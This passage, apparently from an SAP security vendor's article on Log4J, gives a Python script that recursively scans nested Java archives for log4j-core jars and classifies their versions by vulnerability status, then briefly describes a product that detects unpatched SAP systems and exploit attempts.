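Because Log4J ships inside application archives, an inventory has to look into nested archives as well as the file system. The following added example (not SAP or Layer Seven Security code) scans a zip-format archive recursively for log4j-core jars and classifies each by the version boundaries given above; the sample archive is built in memory and its file names are constructed.

```python
import io
import re
import zipfile

JAR_RE = re.compile(r"(?:^|/)log4j-core-(\d+)\.(\d+)(?:\.(\d+))?[^/]*\.jar$")
ARCHIVES = (".jar", ".war", ".ear", ".zip")
MAX_MEMBER_BYTES = 200 * 1024 * 1024  # do not unpack oversized nested archives


def classify(version):
    # Boundaries as stated in the text above. Maintenance releases for older
    # Java versions are not covered by them and need a manual check.
    if version <= (2, 14, 1):
        return "vulnerable"
    if version < (2, 16, 0):
        return "lookups disabled by default"
    return "lookups removed"


def scan_archive(data, origin, max_depth=5):
    """Return (location, version, verdict) for each log4j-core jar in the archive."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [(origin, None, "unreadable archive")]
    findings = []
    with archive:
        for info in archive.infolist():
            where = origin + "!/" + info.filename
            match = JAR_RE.search(info.filename)
            if match:
                # The version is taken from the file name; a missing patch level counts as 0.
                version = tuple(int(part or 0) for part in match.groups())
                findings.append((where, version, classify(version)))
            elif info.filename.lower().endswith(ARCHIVES):
                if max_depth <= 0:
                    findings.append((where, None, "nesting limit reached"))
                elif info.file_size > MAX_MEMBER_BYTES:
                    findings.append((where, None, "too large, skipped"))
                else:
                    nested = archive.read(info.filename)
                    findings.extend(scan_archive(nested, where, max_depth - 1))
    return findings


def build_sample():
    """Build a constructed .ear in memory: one nested .war plus two library jars."""
    def make_zip(entries):
        buffer = io.BytesIO()
        with zipfile.ZipFile(buffer, "w") as zf:
            for name, content in entries.items():
                zf.writestr(name, content)
        return buffer.getvalue()

    war = make_zip({
        "WEB-INF/lib/log4j-core-2.14.1.jar": b"",
        "WEB-INF/lib/other-1.0.jar": b"not a zip",
    })
    return make_zip({
        "app.war": war,
        "lib/log4j-core-2.17.1.jar": b"",
        "lib/log4j-core-2.15.0.jar": b"",
    })


if __name__ == "__main__":
    for location, version, verdict in scan_archive(build_sample(), "sample.ear"):
        print(verdict.ljust(28), location)
```

A file-name match is only a first pass: a jar that has been renamed or repackaged into another library will not be found this way.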

The Cybersecurity Extension for SAP identifies vulnerable SAP systems that have not been patched for the Log4J vulnerability. It also detects and alerts for suspected exploits targeted against SAP Java and Web Dispatcher installations based on exploit signatures. This includes known obfuscations and bypass methods.